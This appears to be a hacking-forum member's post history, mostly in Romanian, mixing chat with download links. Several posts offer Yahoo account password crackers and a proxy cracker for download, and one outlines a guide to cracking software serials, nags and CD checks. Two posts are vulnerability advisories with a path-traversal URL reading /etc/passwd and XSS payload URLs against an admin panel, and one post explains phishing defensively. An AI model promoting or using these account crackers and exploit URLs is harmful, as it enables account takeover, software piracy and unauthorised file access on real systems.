Jump to content

zbeng

Active Members
  • Posts

    2402
  • Joined

  • Last visited

  • Days Won

    3

Everything posted by zbeng

  1. WiFi eBooks Filename: Wireless Internet eBooks.rar Description: Wireless Internet eBooks Filesize: 253.52 MB [url]http://www.megaupload.com/?d=K683OVR2[/url] password: KaliMali
  2. zbeng

    Simulator F1

    he he he prea frumos nu crezi
  3. 1 nu se posteaza aici 2 ca sa ceri minim 10 posturi
  4. SA CRESTI MARE chiar il cautam da erau expirate link-urile :
  5. Index Introduction Serials Windows32BitDisassembler: String Fishing SoftIce: Getting Started Short Intermezzo about APIs and dlls Combining the power of Windows32BitDisassembler and SoftIce SoftIce: The 'Break on Memory Access' Approach Other Serial Protections Patching A warning before we start Finding the offset of the code you want to patch Intermediate way of finding the serial Let's Patch! Spreading the Patch Problems Nags Very Easy Nags (MessageBoxes) Universal approach to get rid of those nags Hard Nags Intermediate: String fishing using a hex-editor and W32dasm Keyfiles Arriving at the protection scheme Some common keyfile checks Visual Basic Cracking Introduction Requirements Visual Basic Programs Approaches Case1: Visual Basic 3 Programs Case2: Visual Basic 4 Programs Case3: Visual Basic 5 and Visual Basic 6 programs Using Numega's Smartcheck Using SoftICE and W32Dasm Greyed targets and CrippleWare Find out if the target is missing a feature Uncrippling CD-Checks Last Words And Greetz Tools API's that might help you breaking into SoftIce API's that are used to get text from the screen API's that protection scheme's might use API's that keyfiles protections use API's that CD protections use API's that are used to read/write from plain text files (INI, CFG) API's that programs use to access the registry API's that have something to do with time API's that put a nag-screen on the screen Visual Basic APIs Compare APIs Other APIs that are common http://learn2crack.com/Guide%20to%20Cracking.htm
  6. Lesson 01 - Being a Hacker Lesson 02 - Windows and Linux Lesson 03 - Ports and Protocols Lesson 04 - Services and Connections Lesson 05 - System Identification Lesson 06 - Malware (Viruses, Trojans, etc.) Lesson 07 - Attack Analysis Lesson 08 - Digital Forensics Lesson 09 - E-mail Security and Privacy Lesson 10 - Web Security and Privacy Lesson 11 - Passwords Lesson 12 - Internet Legalities and Ethics http://uploadfile.org/download.php?id=pJKd2rBWP6AiZjilrWuk
  7. zbeng

    carduri

    exact zi de unde daca e da un PM la unu dintre noi doi
  8. poftim nenea te costa 10€ http://rapidshare.com/files/20838582/Manual_de_spaga.rar.html
  9. poate multi vati intrebat cum gasesc o lista cu proxi ? uitati aici un mic truc : cauta +":8080" +":3128" +":80" filetype:txt in google.com si problema rezolvata
  10. no mai gino dc ne faci asta
  11. 1. Description: ---------------- Vendor's Description: "A simple Java multi-threaded Web Server that supports HTTP/1.0 protocol." xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ------------ 2. The bug: ------------ The program doesn't check for malicious patterns like "/../", so an attacker is able to see and download all the files on the remote system simply using a browser. xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ------------- 3. The code: ------------- To test the vulnerability: http://[host]:6789/../someFile or: http://[host]:6789/../../../../etc/passwd xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx ------------ 4. The fix: ------------ Bug fixed in the version 0.3.4. If you want, you can use my following little patch, that should fix the bug for this version of PWebServer: .. . . ( line: 99 ) fileName = tokenizedLine.nextToken(); // get the relative file name /* start of patch */ boolean check = false; for(int t = 0; t < fileName.length()-1 && check == false; t++){ if(fileName.charAt(t) == '.' && fileName.charAt(t+1) == '.') check = true; } if(check == true) fileName = ""; /* end of patch */ /* empty filename */ if(fileName.equals("") | fileName.equals("/")) { . . ..
  12. 1) Introduction 2) Bug 3) The Code ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =============== 1) Introduction =============== VirtuaNews Admin Panel is a good administration software. Many administrators choose it to be their "safe door", therefore it should strong and safe. The main risk describes in this advisory is the harm that could be done to the administration staff. When the vulnerabilities concerns the staff it is more dangerous that harming users, because if a staff's member cookie is stolen, the attackers can take over the website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ====== 2) Bug ====== The Vulnerabillity is Cross Site Scripting. If an attacker will request any of the following urls from the server: http://<host>/admin.php?"><script>alert('XSS')script> http://<host>/forum/search.php?do=process&showposts=0&query=<script>alert('X SS')script> http://<host>/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&main news=~~~~"></textarea><script>alert('XSS')script> http://<host>/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&main news=~~~~"></textarea>--><script>alert('XSS')script> http://<host>/admin.php?">action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&ma innews=~~~~"></textarea><script>alert('XSS')script> http://<host>/admin.php?action=files&expand="><script>alert('XSS')script> http://<host>/admin.php?action=files_cat_delete&id="><script>alert('XSS')</s cript> http://<host>/admin.php?action=files_check&catid="><script>alert('XSS')</scr ipt> http://<host>/admin.php?action=newslogo_upload&"><script>alert('XSS')</scrip t> XSS appears and the server allows an attacker to inject & execute scripts. In the words of securityfocus.com : ~~~~~~~~~~~~~~~~~~~~~~~~~~ If all of these circumstances are met, an attacker may be able to exploit this issue via a malicious link containing arbitrary HTML and script code as part of the hostname. When the malicious link is clicked by an unsuspecting user, the attacker-supplied HTML and script code will be executed by their web client. This will occur because the server will echo back the malicious hostname supplied in the client's request, without sufficiently escaping HTML and script code. Attacks of this nature may make it possible for attackers to manipulate web content or to steal cookie-based authentication credentials. It may be possible to take arbitrary actions as the victim user. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ =========== 3) The Code =========== http://<host>/admin.php?"><script>alert('XSS')script> http://<host>/forum/search.php?do=process&showposts=0&query=<script>alert('X SS')script> http://<host>/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&main news=~~~~"></textarea><script>alert('XSS')script> http://<host>/admin.php?action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&main news=~~~~"></textarea>--><script>alert('XSS')/script> http://<host>/admin.php?">action=vulns_add&catid=SELECT&title=~~~~~~~~~~~&ma innews=~~~~"></textarea><script>alert('XSS')script> http://<host>/admin.php?action=files&expand="><script>alert('XSS')script> http://<host>/admin.php?action=files_cat_delete&id="><script>alert('XSS')</s cript> http://<host>/admin.php?action=files_check&catid="><script>alert('XSS')</scr ipt> http://<host>/admin.php?action=newslogo_upload&"><script>alert('XSS')</scrip t>
  13. nenea buzz si ma suni pe mine ce zici
  14. sa cresti mare nenea ;9
  15. din motiv de plictiseala si lipsa de topicuri bune pe aici am decis sa vad ce opiniuni aveti voi despre urmatoarea intrebare DE CE MINTIM? noi dc mintim si dupa aia zicem ca nu ne place sa fim mintiti ia sa vad ce ziceti
  16. PRIN LAN AM 4 MEGA SI 600
  17. no me jodas mister enserio se dice cerveza pero yo a lo mejor quiero un botein add ovidiu_g****** si mai vb
  18. Proxy cracker by me with password changer and proxy leecher included. Lots of options and 100% working (It's a must have). Download: http://rapidshare.com/files/8957347/Y_W_Ghost-Cracker.rar.html Or http://www.rogepost.com/n/5401852642
  19. Yahoo-69 Non-Proxy cracker - No proxy - This is used for one who has dynamic IP connection (changing IP after disconnected automatically) - 100% no skipping IDs - Advanced options hehe - Disconnect & Re-Connect automatically if ur IP gets banned - Locked IDs are saved for future crack Wink - Regular options - Full cracking proccess info : ip banned, wrong pass, id locked etc... - Add-on: proxy cracking lol lolz but this is not recommended cuz im not interesting (personal) http://www.4shared.com/file/5614951/182ab226/non-procraker.html
  20. Phishing (derivat din termenul din limba engleza pentru "pescuit") sau "brand spoofing" (imitarea imaginii), este o forma elaborata de sustragere de date, care vizeaza mai ales clientii companiilor ISP, ai bancilor, ai serviciilor bancare online, agentii guvernamentale etc. Atunci cand va publicati adresa de email pe Internet, cand completati formulare online, accesati newsgroup-uri sau site-uri web, datele dumneavoastra pot fi furate de catre aplicatii de indexare pentru Internet si apoi folosite fraudulos. Conceptul de phishing Autorii de phishing creeaza pagini web contrafacute, ce imita imaginea unor corporatii furnizoare de servicii bine-cunoscute, pentru a inspira incredere. Dupa ce colecteaza sau genereaza adrese de email, infractorii "lanseaza momeala". Este trimis un mesaj prin email sau mesagerie instant, cu un subiect credibil, prin care incearca sa va convinga sa completati informatii confidentiale, prin accesarea unei pagini web (link "click aici"; link URL; link tip imagine; text link) sau prin completarea unui formular in textul mesajului. Mesajul pare sa aiba un motiv plauzibil si chiar aduce argumente convingatoare, pentru a va determina sa actionati imediat. Exemple de subiect pentru email: "Update Your PayPal Account" "Your eBay User Account has been suspended!" "Initiativa Bancii Nationale a Romaniei (BNR) - colaborare" Informatiile cerute sunt de obicei: $ Numarul cardului de credit/ debit; $ Codul PIN pentru ATM; $ Informatii despre contul bancar; $ Codul numeric personal/ contul de asigurare; $ Parole; $ Conturi de email; $ Alte date personale. Odata publicate, informatiile nu mai sunt confidentiale si sunt imediat folosite de catre infractori, in interesul lor. In general este foarte greu sa recuperati sumele pierdute, deoarece paginile folosite de autorii de phishing sunt online numai pentru cateva zile sau chiar ore. Tehnici de phishing Principala metoda este folosirea unui mesaj email credibil, intentionat sa va directioneze catre o pagina web falsa. Unele mesaje contin un formular de inscriere direct in textul continut. Trebuie sa tineti cont de faptul ca organizatiile oficiale nu trimit niciodata astfel de mesaje, care solicita informatii personale. In aceste pagini web este posibil sa observati ca adresa URL nu este cea corecta. Exista totusi metode de falsificare a URL-ului: * "Social engineering": URL-ul este foarte asemanator cu cel real, lucru ce poate fi detectat la prima vedere. De exemplu, adresa http://www.volksbank.com poate fi inlocuita cu http://www.voIksbank.com . Daca aveti impresia ca sunt identice, va inselati. Litera mica "l" este inlocuita cu majuscula literei "i". * Vulnerabilitatile browser-ului: Pagina web falsa poate contine un script de exploatare a browser-ului. In acest caz, se afiseaza URL-ul real, insa pagina accesata este cea de pe serverul fals. De exemplu, in bara de adrese din browser se poate afisa o imagine. Nu puteti face "click" in campul barei, pentru a marca URL-ul. Alte tehnici de exploatare aplica un camp fals, in care veti putea chiar sa marcati un URL. * Pop-up: Linkul din email este catre pagina web reala, insa o alta fereastra de navigare se afiseaza in prim-plan. Pagina reala poate fi navigata, practic, fara riscuri, insa trebuie sa va feriti de cealalta fereastra. De obicei, aceste ferestre pop-up nu au o bara de adrese, prin care sa identificati o pagina falsa. * Nici o bara de adrese: Unele pagini false nu afiseaza nici o bara de adrese si, daca nu urmariti acest lucru in mod deosebit, este posibil sa nu observati ca lipseste. In afara de exploatarea barei de adrese, se folosesc si alte tehnici, in mod individual sau suplimentar, pentru a accesa informatii confidentiale: * Alte vulnerabilitati ale browser-ului: Se pot exploata si alte vulnerabilitati ale browser-ului, pentru a descarca si a rula cod malware. Un asemenea program poate fi un troian, care inregistreaza datele introduse de la tastatura si traficul Internet, mai ales cand completati si trimiteti un formular online. * Pharming: Numit si “domain spoofing” (falsificarea domeniului), redirectioneaza utilizatorul catre o pagina web falsa. Desi introduceti adresa corecta, sunteti dirijat catre o alta destinatie. URL-ul corect ramane afisat in browser, neschimbat. Pentru a realiza procesul de redirectionare, rezolutia numelui trebuie modificata. Aceasta se poate face fie prin schimbarea setarilor pentru protocolul TCP/IP, fie printr-o intrare in fisierul hosts. * "Man in the middle": Probabil cea mai elaborata metoda, deoarece nu trebuie sa modifice nimic pe computerul local. Autorul de phishing este situat intre utilizator si serverul fals, dirijand astfel conexiunea. Tehnici de camuflaj Pagina web de phishing poate folosi si trucuri precum: * Tooltip falsificat, * Click-dreapta inaccesibil. Autorii de phishing folosesc tehnici de evitare a programelor antispam/ antiphishing: * Caractere aleatoare sau citate celebre in subiectul sau textul mesajului; * Text invizibil in email HTML; * Continut HTML sau Java in loc de text simplu; * Numai imagini (fara alt text) in continutul mesajului. Consecinte Este foarte greu de stabilit cand un email provine dintr-o sursa oficiala sau nu, deoarece autorii de phishing folosesc foarte multe tehnici, pe care le pot chiar combina. Care sunt consecintele publicarii de informatii confidentiale? $ Infractorii pot face datorii in contul dumneavoastra. $ Pot deschide noi conturi, pot semna contracte de utilitati sau de imprumut in numele dumneavoastra. $ Pot comite infractiuni sub o falsa identitate, folosind datele dumneavoastra. Nu muscati momeala! * Nu completati formulare prin email, cu informati confidentiale. Orice furnizor de servicii competent foloseste pagini web securizate si certificate digitale. * Nu deschideti linkuri sosite prin email, mai ales daca mesajul este neasteptat sau nesolicitat. Contactati expeditorul, pentru a verifica daca intr-adevar a avut intentia de a trimite mesajul (folositi datele de contact primite direct de la furnizor, nu cele primite in acel mesaj). * Nu raspundeti la mesaj. Stergeti mesajul si contactati presupusul expeditor (folositi datele de contact primite direct de la furnizor, nu cele primite in acel mesaj). * Nu deschideti linkurile din continutul mesajului. Intotdeauna introduceti de la tastatura adresa in browser. Reguli de siguranta Repararea daunelor cauzate de phishing poate fi frustranta si laborioasa. Pe langa reducerea productivitatii si consumul de resurse in retea, sustragerea de date provoaca depunerea de eforturi considerabile din partea dumneavoastra: va trebui sa va recuperati identitatea, proprietatea si drepturile, dar si sa va demonstrati nevinovatia. Mult mai usor este sa respectati cateva reguli de siguranta elementare: * Actualizati sistemul de operare si aplicati cele mai recente "patch"-uri imediat ce apar. * Alternati Internet Explorer cu alte browsere. * Instalati solutii antivirus si firewall si mentineti-le la zi. * Introduceti intotdeauna un URL de la tastatura, nu accesand un link. * Asigurati-va ca folositi o pagina web securizata (HTTPS) si verificati certificatele digitale. * Verificati in mod regulat conturile si extrasele bancare si raportati imediat orice abuz. * Raportati mesajele suspecte companiilor de securitate si autoritatilor locale.
  21. http://rapidshare.com/files/20030645/New_Folder.rar Pass::Maidenrulz
×
×
  • Create New...